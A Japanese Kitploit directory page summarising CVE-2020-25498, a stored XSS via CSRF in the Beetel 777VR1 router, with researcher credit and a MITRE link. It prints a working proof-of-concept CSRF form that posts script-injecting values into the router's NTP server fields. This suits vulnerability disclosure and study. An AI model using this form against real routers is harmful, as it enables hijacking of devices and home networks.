Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-25498 — Beetel 777VR1 RouterにおけるCSRFを介した格納型XSS | Kitploit
ツール/GitHubGitHub/the-girl-who-lived/cve-2020-25498
フィッシングツール脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubthe-girl-who-lived/cve-2020-25498

CVE-2020-25498

Beetel 777VR1 RouterにおけるCSRFを介した格納型XSS

リポジトリを見る
3115年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2020-25498: Beetel 777VR1 ルーターにおける CSRF 経由の格納型 XSS

脆弱性の説明

脆弱性のあるエンドポイントにはサーバーサイドの入力検証がなく、悪意のあるスクリプトインジェクションに対するクライアントサイドのフィルタリングも欠如していることが確認されています。攻撃者はこの脆弱性を利用して、エンドポイントに悪意のあるスクリプトを注入でき、そのスクリプトはユーザーが脆弱性のあるエンドポイントを開くたびに実行されます。攻撃者は POST リクエストペイロードを含む悪意のある URL を送信し、CSRF を介して管理モジュールで XSS を実行することで、デバイスを乗っ取り、最終的にはネットワークを乗っ取ることができます。

研究者: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE リンク: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25498

概念実証エクスプロイト:

CSRF HTML コード:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.1.1/form2ntp.cgi" method="POST">
      <input type="hidden" name="ntpstate" value="Enable" />
      <input type="hidden" name="ntpserver" value='google&#46;com"><script>alert(1)</script>' />
      <input type="hidden" name="ntpserver2" value='google&#46;com"><script>alert(2)</script>' />
      <input type="hidden" name="ntpinterval" value="1" />
      <input type="hidden" name="ntptimezone" value="330" />
      <input type="hidden" name="submit&#46;htm&#63;time&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1. システム時刻設定モジュールの NTP サーバー名

パラメーター: サーバー名

概念実証動画:

2. ファイアウォールモジュールの URL フィルターエンドポイント

パラメーター: キーワード

概念実証動画:

ツールをダウンロード